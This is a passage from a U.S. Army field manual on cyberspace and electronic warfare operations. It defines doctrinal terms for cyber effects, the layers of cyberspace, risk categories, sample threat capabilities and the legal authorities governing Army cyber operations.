cyberspace. 
Cyberspace Security 
1-44. Cyberspace security actions are those taken within a protected network to prevent unauthorized access 
to, an exploitation of, or damage to computers, electronic communications systems, and other information 
technology, including platform information technology, as well as the information contained therein, to 
ensure its availability, integrity, authentication, confidentiality, and nonrepudiation.  Cyberspace security is 
not specific to an enemy or adversary. Cyberspace security actions protect the networks and systems through 
all phases of network planning and implementation. Cyberspace security activities include vulnerability 
assessment and analysis, vulnerability management, incident handling, continuous monitoring, and detection 
and restoration capabilities to shield and preserve information and information systems. 
EFFECTS OUTSIDE OF THE DEPARTMENT OF DEFENSE INFORMATION NETWORK AND
CYBERSPACE  
1-45. Effects delivered in and through cyberspace manifest in cyberspace or in one or more of the other 
domains. The Army requests effects in cyberspace after planning and targeting activities. The effects may be 
delivered by or through an OCO or DCO-RA mission. The effects support Army operations and JFC 
objectives. Cyber mission forces conducting cyberspace actions deliver effects in and through cyberspace. 
EW capabilities can be a conduit to deliver effects in and through cyberspace. Joint organizations express the 
effects in cyberspace in different terms than expressed in the traditional Army targeting methodology. Army 
targeting efforts result in requirements using Army terms similar in meaning to joint cyberspace terms. 
However, the difference in terms requires that any requests from echelons corps and below to joint 
organizations use the joint terms for effects in cyberspace .  
1-46. Joint cyberspace operations doctrine describes cyberspace actions. Cyberspace actions at the joint level 
require creating various direct denial effects in cyberspace (degradation, disruption, or destruction). Joint 
cyberspace operations doctrine also explains that manipulation leads to denial (hidden or manifesting) in any 
domain. 
1-47. These specific actions are — 
Deny. To degrade, disrupt, or destroy access to, operation of, or availability of a target by a
specified level for a specified time. Denial prevents enemy or adversary use of resources.
Degrade. To deny access (a function of amount) to, or operation of, a target to a level represented
as a percentage of capacity. Level of degradation must be specified. If a specific time is required,
it can be specified.
Disrupt. To completely but temporarily deny (a function of time) access to, or operation of, a target
for a period of time. A desired start and stop time are normally specified. Disruption can be
considered a special case of degradation where the degradation level selected is 100 percent.
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-11  Destroy. To permanently, completely, and irreparably deny (time and amount are both maximized) 
access to, or operation of, a target.  
 Manipulate. To control or change t he enemy or adversary ’s information, information systems, 
and/or networks  in a manner that supports the commander's objectives.  
1-48. Army commanders request effects using the terms deny, degrade, disrupt, destroy , and manipulate. 
The Army  considers these as sep arate effects rather than a subset of deny . These terms are common for 
targeting guidance or to describe effects for  information operations (IO). These are desired effects that 
support operations and are achievable using cyberspace capabilities. Army planners will utilize these terms 
to describe and plan for cyberspace a nd electronic warfare effects. The most common effects associated with 
cyberspace operations are deny, degrade, disrupt, destroy, and manipulate. (For more effects or information 
on eff ects see ATP 3 -60.)  
 Denial operations  are actions to hinder or deny the enemy the use of space, personnel, supplies, 
or facilities (FM 3 -90-1). An example of deny is to use EW capabilities to jam specific frequencies  
using an EW capability  for a predeterm ined amount of time, or to block a router communication 
port using cyberspace capability for some predetermined amount of time; however, the duration 
of denial will depend on the enemy's ability to reconstitute.  
 Degrade is to use nonlethal or temporary me ans to reduce the effectiveness or efficiency of 
adversary command and control systems and information collections efforts or means. An example 
of degrade is slowing the cyberspace connection speed affecting the ability to effectively 
communicate or pass d ata in a timely manner.  
 Disrupt  is a tactical mission task in which a commander integrates direct and indirect fires, terrain, 
and obstacles to upset an enemy's formation or tempo, interrupt the enemy's timetable, or cause 
enemy forces to commit premature ly or attack in a piecemeal fashion. An obstacle effect that 
focuses fire s planning and obstacle effort s to cause the enemy force to break up its formation and 
tempo, interrupt its timetable, commit breaching assets prematurely, and attack in a piecemeal 
effort (FM 3 -90-1). An example of disrupt is interrupting the connection to cyberspace, either 
wired or wireless, affecting the ability to communicate or pass data.  
 Destroy  is tactical mission task that physically renders an enemy force combat -ineffective u ntil it 
is reconstituted. Alternatively, to destroy a combat system is to damage it so badly that it cannot 
perform any function or be restored to a usable condition without being entirely rebuilt (FM 3 -90-
1). Destroy is applying lethal combat power on an enemy capability so that it can no longer 
perform any function. The enemy cannot restore it to a usable condition without being completely 
rebuilt. An example of destroy using cyberspace capabilities is causing a system to lose all of its 
operating informa tion or causing it to overheat to a point it is no longer usable. (See ADRP 3 -0 
for more information on destroy. ) 
 Manipulate  is to control or change the adversary's information, information systems, and/or 
networks in a manner that supports the com mander's  objectives . The Army uses the same 
description  as the joint cyberspace action for this effect.  
 Deceive is when military leaders attempt to mislead threat decision makers by manipulating their 
understanding of reality. An example of deceive is modifying a  message causing the enemy or 
adversary to assemble in a location not originally designated by their own chain of command.  
More information on deceive is found in FM 3 -90-1 and ATP 3 -60. 
1-49. Effects in and through cyberspace may have the same consequences as other types of traditional effects. 
Effects during operations include lethal and non -lethal actions and may be direct or indirect. Direct effects 
are first order consequences and indirect effects are second, third , or higher order consequences. Similar  
characteristics of direct and indirect effects in cyberspace can be cumulative or cascading if desired. These 
effects are planned and controlled in order to meet the commander’s objectives.  Cumulative refers to 
compounding effects and cascading refers to infl uencing other systems with a rippling effect. The desired 
effects in cyberspace can support operations as another means to shape the operational environment to 
provide an advantage.  (For more information on cascading and cumulative effects see JP 3 -60.) 
Chapter 1  
1-12 FM 3 -12 11 April 2017  SECTION  II – UNDERSTANDING CYBERS PACE AND ENVIRONMENTS  
1-50. Understanding the cyberspace domain begins with understanding the EMS, the information 
environment, the layers of cyberspace, and the characteristics of cyberspace. Understanding the integration 
of cyber space operations begins with comprehending cyberspace as a part of the operational environment 
and the impact on operational and mission variables : threat s, risks , and authorities.  
CYBERSPACE AND THE E LECTROMAGNETIC SPECT RUM  
1-51. Cyberspace wireless capabiliti es use the EMS for a transport me dium  to form links in the DODIN. The 
electromagnetic spectrum  is the range of frequencies of electromagnetic radiation from zero to infinity. It is 
divided into 26 alphabetically designa ted bands (JP 3 -13.1) . The Army manages its use of the EMS through 
SMO . Spectrum management operations  are the interrelated functions of spectrum management, frequency 
assignment, host nation coordination, and policy that together enable the planning, management, and 
execution of operations within the electromagnetic operational environment during all phas es of military 
operations (FM 6 -02). Electromagnetic spectrum operations  (EMSO)  include SMO and EW  (see section  three  
for information on EW ). SMO are the management functions of EMSO  managing  the man -made access to 
the EMS.  
1-52. Conducting SMO supports and enab les the execution of cyberspace and EW operations. The objective 
is to ensure access to the EMS to support Army operations. Synchronizing  efforts between cyberspace and 
EW operations, and other users of the spectrum, allow unifying and complementary effort s and minimizes 
conflicting effects  within the spectrum. (See figure 1 -5.) (For more information on SMO see FM 6 -02 and 
ATP 6 -02.70. )  
Figure 1 -5. The electromagnetic spectrum  
CYBERSPACE AND THE I NFORMATION ENVIRONME NT 
1-53. The Army conducts cyberspace and EW operations in the information environment. The information 
environment  is the aggregate of individuals, organizations, and systems that collect, process, disseminate, or 
act on information (JP 3 -13). The ease of access to technical networks facilitates information sharing and 
enhances the social aspect of the information environment. The dimensions of the information environment 

Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-13 are physical, informational, and cognitive. IO, whether inside or outside  of cyberspace, can affect friendly, 
neutral , and threat operations within cyberspace.  (For more information on the information environment see 
JP 3-13.) 
PHYSICAL DIMENSION  
1-54. The physical  dimension consists of the physical portions  of the environment. The tangible elements of 
cyberspace  and access to the EMS  are part of the physical dimension of the information environment. The 
tangible network elements include communications networks, information systems, and network 
infrastructure s. This dimension is where network platforms reside along with the infrastructures that enable 
them.  EW platforms also reside in this dimension.  
INFORMATIONAL DIMENSION  
1-55. The informational  dimension consists of the information  itself. Cyberspace  and EW operations  support 
collecting, processing, storing, disseminating, and displaying text, images, or data  in this dimension . The 
informational dimension enables the linkage between the physical and cognitive dimensions. This dimens ion 
links to cyberspace and the EMS due to the volume of information resident on and traversing information 
technology infrastructures. The physical dimension of cyberspace  and EW operations  allows access to and 
control of the information and data to those  in the cognitive dimension. This dimension includes data at rest 
or in transit.  
COGNITIVE DIMENSION  
1-56. The cognitive dimension  encompasses the minds of those who transmit, receive, and respond to or act 
on information (JP 3 -13). The cognitive dimension in cyberspace represents individuals, groups, or 
organizations. Cyberspace links the data and ideas of those who transmit, receive, respond or act on, or add 
new information. This dimension represents the individuals that utilize c yberspace.  
CYBERSPACE LAYERS  
1-57. Cyberspace  can be described in terms of three layers: physical network, logical network, and cyber -
persona (JP 3 -12[R]) . Commanders and staffs leverage the layers of cyberspace to build, gain, and main tain 
situational understanding and create operational opportunities.  
PHYSICAL NETWORK LAYER  
1-58. The physical network layer of cyberspace is comprised of the geographic component and  is part of  the 
physical dimension . The geographic component is the location i n land, air, maritime, or space where elements 
of the network reside. The physical network layer is comprised of the hardware, system software, and 
infrastructure (wired, wireless, cable links, EMS links, satellite, and optical) that supports the network a nd 
the physical connectors (wires, cables, radio frequency, routers, switches, servers, and computers). The 
physical network layer uses logical constructs as the primary method of security and integrity.  
LOGICAL NETWORK LAYER  
1-59. The logical network layer con sists of the components of the network related to one another  in a way 
abstracted  from the physical network.  For instance, nodes in the physical layer may logically relate to one 
another to form entities in cyberspace not tied to a specific node, path, or individual. Web sites hosted on 
servers in multiple physical locations where content can be accessed through a single uniform resource 
locator or web address provide an example.  This may also include the logical programming to look for the 
best communicati ons route, which is not the shortest physical route, to provide the information requested.  
CYBER -PERSONA LAYER  
1-60. The cyber -persona layer is a digital representation of an individual or entity identity in cyberspace. 
This layer consists of the people who  actually use the network and therefore have one or more identities that 
Chapter 1  
1-14 FM 3 -12 11 April 2017  can be identified, attributed, and acted upon. These identities may include e -mail addresses, social networking 
identities, other web forum identities, computer internet protocol addr esses, and mobile device numbers. One 
individual may have multiple cyber -personas through internet services a t work and personal e -mail addresses, 
web forum , chat room, and social networking site identities ; which may vary in the degree to which they are 
factually accurate. The authenticity of a cyber -persona is a  concern  especially with the ability of a threat force 
to hide their identity . 
1-61. Conversely, a single cyber -persona can have multiple users — for example, a username and password 
for an administrativ e account multiple people access. As a result cyber -personas can be complex, with 
elements in many virtual locations, but normally not linked to a single physical location or form. 
Consequently, attributing responsibility and targeting in cyberspace requir es significant intelligence and 
technical knowledge. Understanding the complexity of the cyber -persona allows leaders and commanders to 
make more informed decisions. Figure 1 -6 shows an individual person with multiple cyber -persona s and the 
relationship wi th the other layers.  
Figure 1 -6. Cyber -persona relationship to the physical and logical layers  

Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-15 THE CHARACTERISTICS OF CYBERSPACE  
1-62. To better understand cyberspace , examine the physical information technology networks . For instance, 
cyberspace is interconnected computer communications networks (logical layer) that make information 
globally available through wired and wireless connections  at high rates of speed using the physical layer , 
which is then accessed by individ uals using the cyber -persona layer . The internet pervades societies and 
enable s global  communication and information flow. Cyberspace characteristics include — 
 Networked.  
 Socially enabling.  
 Technical.  
 Interdependent and interrelated.  
 Vulnerable.  
NETWORKED  
1-63. Cyberspace is an extensive and complex global network of wired and wireless links connecting nodes 
that permeate every domain. The core of these networks are technological infrastructures consisting of several 
distinct enclaves connected into a single logi cal network that enables data transport. Identifying these 
infrastructures and their operation s is accomplished by analyzing the layers of cyberspace, the dimensions of 
the information environment, the variables of the operational environment, and the othe r technical aspects of 
wired and wireless networks. The networks can cross geographic and political boundaries connecting 
individuals , organizations, and systems around the world.  
SOCIAL LY ENABLING  
1-64. Cyberspace allows interactivity among individuals, groups,  organizations, and nation -states. Computer 
systems and technical networks make it possible to create, store, process, manipulate, and quickly transport 
data and information for a select or very broad audience. Users can apply data and information to exert  
influence, accomplish tasks, and make decisions. Text messaging, e -mail, e -commerce, social media , and 
other forms of interpersonal communication are possible because of cyberspace.  
TECHNICAL  
1-65. Advancements in technology increase the complexity of hardware and software system components 
and devices. Cyberspace consists of numerous elements requiring personnel with specific technical skills. 
For example, the development of encryption and encoding require personnel trained to perform specialized 
functions that  comply with protocols and other industry standards. The technical network infrastructure and 
logical layer is complex, but accessing and utilizing cyberspace is relatively simple. The advanced use of the 
EMS is a fundamental part of cyberspace.  
INTERDEPEN DENT AND INTERRELATED  
1-66. Operations within the other four domains are dependent on cyberspace. Commanders achieve 
situational understanding of the operational environment and the interdependent and interrelated nature of 
the cyberspace domain through intellig ence preparation of the battlefield (IPB) and information 
requirements. The dependence of information and data distribution, timeliness, and quantity directly relate 
to the network infrastructure capabilities and limitations . IPB can help identify capabili ties and vulnerabilities 
of the enemy’s and adversary’s cyberspace infrastructure, including electronic links to automated weapons 
systems, communications systems, and other critical nodes supporting the threat network. Unique to the 
cyberspace domain is t he ability of combatants and non -combatants to move information across the domain 
quickly.  
VULNERABLE  
1-67. Cyberspace is vulnerable for several reasons including ease of access, network and software 
complexity, lack of security consideration in network design a nd software development, and inappropriate 
Chapter 1 
1-16 FM 3-12  11 April 2017 user activity. Access to cyberspace by an individual or group with a networked device is easy, and an 
individual with a single device may be able to disable an entire network. Vulnerabilities in the systems that 
operate in cyberspace contribute to a continuous obligation to manage risk and protect portions of cyberspace. 
Understanding the vulnerabilities of DODIN may lead to changes of the operational design. Vulnerabilities 
found on enemy or adversary systems may cause changes to those portions of cyberspace as well. Effects 
generated in cyberspace can have global impact across the physical domains. 
CYBERSPACE AS A COMPONENT OF THE OPERATIONAL 
ENVIRONMENT 
1-68. An operational environment  is a composite of the conditions, circumstances, and influences that affect 
the employment of capabilities and bear on the decisions of the commander (JP 3- 0). Cyberspace, operational 
variables, mission variables, and the dimensions of the information environment share a complex relationship 
within an operational environment. Staffs perform tasks and missions in and through cyberspace to support 
the warfighting functions. Cyberspace supports, enables, and integrates operations for warfighting functions 
in the operational environment within all the domains. 
1-69. While cyberspace enables communications capabilities, it also creates critical vulnerabilities for 
adversaries and enemies to attack or exploit. The complexity, low entry cost, widely available resources, 
minimally required technological investment, and ease of anonymity in cyberspace enables enemies and 
adversaries to inflict serious harm. The expanded availability of commercial off-the-shelf technology 
provides adversaries with increasingly flexible and affordable technology to adapt to military purposes. Low 
barriers to use cyberspace significantly decrease the traditional capability gap between the United State s and 
adversaries, allowing them to field sophisticated cyberspace capabilities. 
1-70. DODIN operations enables Army operations. DODIN operations, DCO, EW, and intelligence facilitate 
freedom of maneuver in cyberspace. Freedom of maneuver allows the integration of the warfighting functions 
across all domains. Army operations, enabled and supported by the DODIN, support the JFC’s  objectives. 
SITUATIONAL UNDERSTANDING AND AWARENESS OF CYBERSPACE  
1-71. Situational understanding  is the product of applying analysis and judgment to relevant information to 
determine the relationships among the operational and mission variables to facilitate decision making (ADP 
5-0). Operational variables enable a comprehensive understanding of a given operational environment, while 
mission variables enable a more focused understanding of a given area of operations. The continuous 
application of these analytical frameworks enables the commander and staff to analyze cyberspace from 
various perspectives throughout the operations process. (See FM 6-0 for additional information on 
operational and mission variables.) 
1-72. Situational understanding of cyberspace is gained and maintained by identifying, characterizing, and 
monitoring certain types of enemy, adversary, and friendly activity in designated cyberspace and the EMS. 
Situational understanding of cyberspace involves — 
Developing, disseminating, and maintaining relevant information enabling the commander and
staff to achieve situational understanding of friendly, enemy, and adversary utilization of
cyberspace, including the cyberspace related use of the EMS.
Determining, validating, and mitigating network intrusions or other unauthorized activities within
friendly force networks, particularly the Army’s contribution.
Information collection efforts to support cyberspace operations to produce and disseminate a
common operational picture and to answer the commander's critical information requirements (see
FM 3-55 for additional information). Continuous tracking, monitoring and assessment of friendly
force activity inside and outside of the DODIN including collaboration with higher headquarters
and their development of joint cyberspace situational awareness (see JP 3-12[R] for additional
information).
Identifying and applying authorities, other legal considerations, intelligence gain or loss, and
associated risks that each serve to inform decision making.
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-17  Direct coordination with host nations to develop and monitor the status of critical infrastructure 
and key resource s. 
1-73. It is important to ensure commanders and staff understand h ow cyberspace enables their operations. 
Cyberspace includes  physical and logical networks  and cyber -personas. The networks  include  nodes linked 
together by transmission paths. A link is the connection between nodes. A node  is broadly defined as an 
element of a system that represents a person, place, or physical thing (see JP 3 -0). A technical definition 
describes a node as a physical location that provides terminating, switching,  or gateway access services to 
support information exchange (see JP 6 -0). Nodes, along with the transmission paths that link them together, 
contain in -transit and resident data available for access and use by individuals, groups, and organizations. 
Combini ng a network diagram with other situational information enhances the understanding of the 
operational environment because of the inclusion of cyberspace specific information.  
1-74. Some nodes in cyberspace, especially commercial systems, are used by various enti ties, including  
friendly, neutral, and enemy or adversary . Figure 1 -7 displays friendly, threat , and neutral  (or non -attributed)  
networks in an operational area. Network nodes, links , and communication s link types provide additional 
information to form a b etter picture of the operational environment. Included is the threat network overlay 
depicting network nodes used by enemies and adversaries. The graphic includes nodes located at known unit, 
adversary and host nation locations as elements of physical infr astructure, and transmission paths as wired 
or wireless links (through the EMS). Friendly units aid in situational understanding by identifying their 
location relative to the enemy, adversary, and host nation nodes. Combining the operational view with the 
network diagram aids in identifying key terrain in cyberspace.  
Figure 1 -7. Operational area with network topology information  

Chapter 1 
1-18 FM 3-12  11 April 2017 1-75. In the context of traditional land operations, key terrain  is any locality, or area, the seizure or retention 
of which affords a marked advantage to either combatant (JP 2-01.3). However, cyberspace operations uses 
the concept of key terrain as a model to identify key aspects of the cyberspace domain. Identified key terrain 
in cyberspace is subject to actions the controlling combatant (whether friendly, enemy, or adversary) deems 
advantageous such as defending, exploiting, and attacking. References to key terrain correspond to nodes, 
links, processes, or assets in cyberspace, whether part of the physical, logical, or cyber-persona layer. The 
marked advantage of key terrain in cyberspace may be for intelligence, to support network connectivity, a 
priority for defense, or to enable a key function or capability. 
CYBERSPACE AND THE OPERATIONAL VARIABLES  
1-76. Commanders and staffs continually analyze and describe the operational environment in terms of eight 
interrelated operational variables: political, military, economic, social, information, infrastructure, physical 
environment, and time. Each variable applied to an analysis of designated cyberspace can enable a more 
comprehensive understanding of the operational environment. The analysis describes the planning, 
preparation, execution, and assessment activities for both the wired and EMS portions cyberspace operations. 
(See FM 6-0 for more information on operational variables.) The following are operational variable example 
questions specific to networks and nodes — 
Political . What networks and nodes require the most emphasis on security and defense to enable
the functioning of the government?
Military . Where are networks and nodes utilized by enemy and adversary actors to enable their
activities?
Economic . What networks and nodes require the most emphasis on security and defense to enable
commerce and other economic-related activities?
Social . What network nodes enable communication with the host nation population for the purpose
of providing information or protecting them from potential negative effects caused by military
operations in cyberspace?
Information . What is the nature of the data transiting cyberspace that influences or otherwise
affects military operations?
Infrastructure . What networks and nodes enable critical infrastructure and key resource
capabilities and supporting supervisory control and data acquisition systems?
Physical Environment . How are wireless networks affected by the electromagnetic environment
which includes terrain and weather?
Time . What are the optimal times to create effects to support the overarching mission?
CYBERSPACE AND THE MISSION VARIABLES  
1-77. The analysis of mission variables specific to cyberspace operations enables Army forces to integrate 
and synchronize cyberspace capabilities to support Army operations. Mission variables describe 
characteristics of the area of operations. The mission variables are mission, enemy, terrain and weather, 
troops and support available, time available, and civil considerations. (See ADRP 5-0 and FM 6-0 for more 
information on mission variables.) For cyberspace operations, mission variables provide an integrating 
framework upon which critical questions can be asked and answered throughout the operations process. The 
questions may be specific to either the wired portion of cyberspace , the EMS, or both. The following is a list 
of the mission variables example questions — 
Mission . Where can we integrate elements of cyberspace operations to support the unit mission?
What essential tasks could be addressed by the creation of one or more effects by cyberspace
operations?
Enemy . How can we leverage information collection efforts regarding threat intentions,
capabilities, composition, and disposition in cyberspace? What enemy vulnerabilities can be
exploited by cyberspace capabilities?
Terrain and weather . What are the opportunities and risks associated with the employment of
cyberspace operations capabilities when terrain and weather may cause adverse impacts on
supporting information technology infrastructures?
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-19  Troops and support available . What resources are available (internal and ex ternal) to integrate, 
synchronize, and execute cyberspace operations? What is the process to request, receive, and 
integrate these resources?  
 Time available . How can we synchronize OCO and related desired effects with the scheme of 
maneuver within the time  available for planning and execution?  
 Civil considerations . How can we employ cyberspace operations without negative impacts on 
noncombatants?  
RISK IN CYBERSPACE  
1-78. Risk is inherent in all military operations. When commanders accept risk they create opportunities to 
seize, retain, and exploit the initiative and achieve decisive results. The willingness to incur risk is often the 
key to exposing enemy and adversary weaknesses considered beyond friendly reach (ADRP 3 -0). 
Commanders asse ss and mitigate risk continuously throughout the operations process. Many of the risks to 
the DODIN and the Army’s contribution to cyberspace come from enemies, adversaries, and insiders. Some 
threats are well equipped and well trained while some are novic es using readily available and relatively 
inexpensive equipment and software. Army users of the DODIN are trained  on cybersecurity, focusing on 
safe use of information technology and  to recognize how threats operate to help mitigate risks.  
1-79. Risk management is the Army’s primary decision -making process for identifying hazards and 
controlling risks. Using this process, operational effectiveness and the probability of mission accomplishment 
increases. This provides a way of identifying hazards, assessing them, and managing the associated risk. The 
process applies to all types of operations, tasks, and activities including cyberspace operations. The factors 
of mission, enemy, terrain and weather, troops and support available, time available, and civil  considerati ons 
provide a standardized methodology for addressing both threat and hazard based risk. Risks associated with 
cyberspace operations fall into four major categories — 
 Operational risks.  
 Technical risks.  
 Policy risks.  
 Operations security risks.  
Note . See ATP  5-19 for more on risk management.  
OPERATIONAL RISKS 
1-80. Operational risk s pertain to consequences that cyber space  threats pose to mission effectiveness. 
Operational consequences are the measure of cyberspace attack effectiveness. Cyb erspace intrusions or 
attacks can compromise technical networks, systems, and data ; which can result in operational consequences 
such as injury or death of personnel, damage to or loss of equipment or property, degradation of capabilities, 
mission degradat ion, or even mission failure. Exfiltration of data from Army networks by the enemy can 
undermine the element of surprise and result in an ambush. Enemy or adversary forces may conduct 
cyberspace and EMS attacks to exposed friendly networks and capabilities , compromising future cyberspace 
attack s and cyberspace exploitation missions.  
TECHNICAL RISKS 
1-81. Technical risks  are exploitable weaknesses in Army networks and systems. Nearly every technical 
system within the Army is networked, creating shared vulnerabilities. These potentially vulnerable networked 
systems and components directly impact the Army's ability to proje ct military power and support the mission. 
DCO and cybersecurity measures mitigate risks and defend against the threats from taking advantage of the 
technical vulnerabilities. Robust systems engineering, supply chain risk management, security, 
counterintel ligence, intelligence, hardware and software assurance, and information systems security 
engineering disciplines enable the Army to manage technical risk to system integrity and trust.  Friendly 
forces examine the technical risks when conducting cyberspace attacks to avoid making friendly networks 
vulnerable to enemy cyberspace counterattacks. The Army uses a defense -in-depth approach, utilizing 
Chapter 1 
1-20 FM 3-12  11 April 2017 software; such as anti-virus and anti-malware programs, monitoring hardware and software, network sensors , 
intrusion prevention, and physical security to mitigate technical risks. These are effective when all elements 
are implemented and updated regularly.  
POLICY RISKS 
1-82. Policy risk pertains to authorities, legal guidance, and international law. Policies address cyberspace 
boundaries, authorities, and responsibilities. Commanders and decision makers must perform risk 
assessments and consider known probable cascading and collateral effects due to overlapping interests 
between military, civil, government, private, and corporate activities on shared networks in cyberspace. 
Policies, the United States Code (USC), Uniform Code of Military Justice, regulations, publications, 
operation orders, and standard operating procedures all constitute a body of governance for making decisions 
about activities in cyberspace. 
1-83. Risk occurs where policy fails to address operational necessity. For example, due to policy concerns, 
an execution order or applicable rules of engagement may limit cyberspace operations to only those 
operations that result in no or low levels of collateral effects. A collateral effects analysis to meet policy 
limits is distinct from the proportionality and necessity analysis required by the law of war. Even if a proposed 
cyberspace operation is permissible after a collateral effects analysis, the proposed cyberspace operation must 
determine a legitimate military objective also be permissible under the law of war. 
1-84. Policy risk applies to risk management under civil or legal considerations. An OCO mission requested 
by an Army unit may pose risk to host nation civilians and noncombatants in an operational environment 
where a standing objective is to minimize collateral damage. During the course of a mission, it may be in the 
Army's best interest for host nation populations to be able to perform day- to-day activities. Interruptions of 
civil networks may present hazards to Army networks and pose dangers to Army forces because of social 
impacts that lead to riots, criminal activity, and the emergence of insurgent opportunists seeking to exploit 
civil unrest. 
OPERATIONS SECURITY RISKS 
1-85. Cyberspace provides a venue for operations security risks. The Army depends on security programs 
and cybersecurity training to mitigate the operations security risks. Commanders emphasize and establish 
operations security programs to mitigate the risks. Operations security measures include actions and 
information on the DODIN and non-DODIN information systems and networks. All personnel are 
responsible for protecting sensitive and critical information. (See AR 530-1 for information about operations 
security.) 
Note . See AR 530-1 for information about operations security.  
THREATS IN CYBERSPACE  
1-86. The Army faces multiple, simultaneous, and continuous threats in cyberspace. A threat  is any 
combination of actors, entities, or forces that have the capability and intent to harm the United States forces, 
United States national interests, or the homeland (ADRP 3- 0). Threats include state and non-state actors, 
criminals, insider threats, and the unwitting individuals who intend no malice. These diverse threats have 
disparate agendas, alliances, and range of capabilities. Enemies and adversaries employ regular and irregular 
forces and use an ever-changing variety of conventional and unconventional tactics. Risks from insiders may 
be malicious or cause damage unintentionally. Insider risks include non-compliance of policies and 
regulations, causing vulnerabilities on the network. Table 1- 1 on page 1-21 lists sample threat capabilities 
with examples of methods, indicators, and first order effects. 
Cyberspace and Electronic Warfare Operations Fundamentals  
11 April 2017  FM 3 -12 1-21 Table 1 -1. Sample cyberspace  and electronic warfare  threat capabilities  
Capability  Methods  Indicators  First -order effects  
Denial of service 
attack  Overwhelming a web 
service, server, or 
other network node 
with traffic to 
consume resources 
preventing legitimate 
traffic  Abnormal network 
performance, inability to 
navigate web and access 
sites, uncontrolled spam, 
and system reboots  Degraded network 
capabilities ranging from 
limited operational planning 
to total denial of use  
Network 
penetration  Man-in-the-middle 
attacks, phishing, 
poisoning, stolen 
certificates, and 
exploiting 
unencrypted 
messages and 
homepages with 
poor security 
features  Unfamiliar e -mails, official 
looking addresses requiring 
urgent reply, internet 
protocol packets replaced, 
non-legitimate pages with 
the look of legitimate sites, 
directed moves from site to 
site, requests to upgrade 
and validate information, 
and unknown links  Uncontrolled access to 
networks, manipulation of 
networks leading to 
degraded or compromised 
capabilitie s that deny 
situational awareness  or 
theft of data  
Emplaced malware 
(virus, worms 
spyware, and 
rootkits)  Phishing, spear -
phishing, pharming, 
insider threat 
introduction, open -
source automation 
services, victim 
activated through 
drive -by downloads 
and vict im emplaced 
data storage devices  Pop-ups, erroneous error 
reports, planted removable 
storage media, unknown e -
mail attachments, changed 
passwords without user 
knowledge, automatic 
downloads, unknown apps, 
and degraded network  Spyware and malware on 
affecte d systems allow 
electronic reconnaissance, 
manipulation, and 
degrading system 
performance  
Disrupt or deny 
information systems 
in the EMS  Prevent friendly 
antennas from 
receiving data 
transmitted in the 
EMS by using 
military or 
commercially 
available high -
powered lasers, high 
powered 
microwaves, and 
repurposed or re -
engineered 
communications 
systems  Symptoms may not be 
evident if passive; m ay 
manifest as transmission 
interference, software or 
hardware malfunctions, or 
the inability to transmit data  Degraded or complete 
denial of service in ability to 
control the EMS denying 
situational awareness and 
degrading operational 
planning  
AUTHORITIES  
1-87. The United States Constitution establishes the authority of the President as Commander in Chief of the 
Armed Forces and gives authority for Congress to fund and regulate the Armed Forces. The President, as 
Commander in Chief commands the missio ns of the Armed Forces and, according to  the laws passed by 
Congress, administers the Armed Forces.  
1-88. Army Commanders conduct cyberspace operations and EW when directed by the orders of the 
President of the United States, the Secretary of Defense, and Combat ant Commanders designated to conduct 
operations on behalf of the President. These orders are issued under the President’s authority from Article II, 
United States Constitution, in consideration of the Bill of Rights, other executive orders, presidential po licy, 
DOD and DA regulations, U.S. Treaty obligations, and other laws (including funding appro priations) passed 
by Congress.  
Chapter 1  
1-22 FM 3 -12 11 April 2017  1-89. Within this legal framework, Army forces conduct cyberspace and EW operations as authorized 
through Execute Ord ers (EXORDs); Operations Orders; Rules of Engagement; and the policies directed by 
the Secretary of Defense  and the Combatant Commanders.  
1-90. Army forces conduct cyberspace operations and EW as part of the joint force. Army forces may 
conduct OCO, DCO, and EW with Army force organic or joint requested effects to support  the joint 
commander’s intent . (See JP 3 -12(R), Cyberspace Operations and JP 3 -13.1, Electronic Warfare  for more 
information .) United States Strategic Command  has overall responsibility for direc ting DODIN operations 
and defense , which has been delegated to the Commander, U.S. Cyber Command for execution . U.S. Army 
Cyber Command (ARCYBER) and Second Army conduct DODIN operations and DCO within Army 
networks, and when directed, within other DOD and  non-DOD networks.  
1-91. Army forces conduct operations directed by the President while adhering to appropriations, 
authorizations, an d statutes of the USC  by Congress . These statutes cover wide areas of law including 
domestic security, the regulation of the Arm ed Forces, Federal crimes, the National Guard, information 
technology acquisition and service, electromagnetic spectrum  management, and intelligence.  
1-92. Domestic Security , USC Title 6 . Establishes responsibilities for information analysis and infrastructure 
protection, chief information officers, and cybersecurity oversight. USC Title 6 responsibilities include 
comprehensive assessments of key resources, critical infrastructure vulnerabilities, and identifying priorities 
for protective and supportive measures regarding threats. (For more information, see U.S. Code Title 6. ) 
1-93. The Armed Forces , USC Title 10 , Enables the Army to organize, train, equip, and provide land, 
cyberspace operations, and EW units and headquarters. USC Title 10 authorities and restrictions provide 
context and foundation for how the Secretary of Defense directs military cyberspace operations, EW, and 
military intelligence operations.  
1-94. Crimes and Criminal Procedure, USC Title 18 . Army forces conduct cyberspace operations and EW 
in compliance with Federal law and takes measures to ensure operations respect the rights of persons against 
unlawful searches and seizures pursuant to the 4th Amendment. Coordination with the Army Crimina l 
Investigation Division ensures appropriate investigation of criminal activity on the DODIN  under Title 18 
authorities . USC Title 18  includes those c rimes conducted in cyberspace.  
1-95. The National Guard, USC Title 32 . National Guard units are state military u nits which are equipped 
and trained pursuant to Federal statutory authori zation. The National Guard, may conduct missions for their 
state, but paid for by the Federal government under USC Title 32, if the Secretary of Defense determines the 
mission is in t he interests of the DOD . 
1-96. Information Technology Acquisition , USC Title 40, Ch. 113, is applicable to the Army and all Federal 
agencies. USC Title 40 establishes the responsibilities of the agency heads and agency chief information 
officers and guidance for  acquisit ion of information technology.  
1-97. USC Title 44, Public Printing and Documents, establishes responsibilities of agency heads for statutory 
requirements and authority for ensuring information security and information resource management. This 
includes information security in cyberspace.  
1-98. Telecommunications, USC Title 47 , prescribes the statutory requirements and authority for access to, 
and use of, the EMS within the Un ited States and Possessions to F ederal agencies. The chief information 
officer /assista nt chief of staff, signal  (G-6), as outlined in AR 5-12, implements national , international , DOD , 
joint, host nation , and Headquarters, Department of the Army spectrum management policies and guidance 
